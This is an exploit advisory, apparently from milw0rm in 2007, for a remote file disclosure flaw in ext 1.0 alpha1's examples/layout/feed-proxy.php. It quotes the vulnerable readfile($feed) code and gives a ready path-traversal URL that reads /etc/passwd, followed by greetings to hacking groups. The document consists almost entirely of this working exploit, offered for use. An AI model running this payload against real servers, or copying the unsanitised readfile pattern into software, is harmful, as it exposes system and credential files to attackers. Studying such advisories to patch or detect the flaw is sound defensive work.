# ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure # D.Script: http://yui-ext.com/deploy/ext-1.0-alpha1.zip # Discovered by: Alkomandoz Hacker # Homepage: http://www.asb-may.net - mohandko.com - sniper-sa.com - tryag.com # V.Code In /examples/layout/feed-proxy.php ---------------------------------------------------------- header('Content-Type: text/xml'); readfile($feed); return; } ?> ---------------------------------------------------------- # Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http../../../../../../etc/passwd # Greetz To: AsbMay's Group & City Of Ghost Team # milw0rm.com [2007-04-25]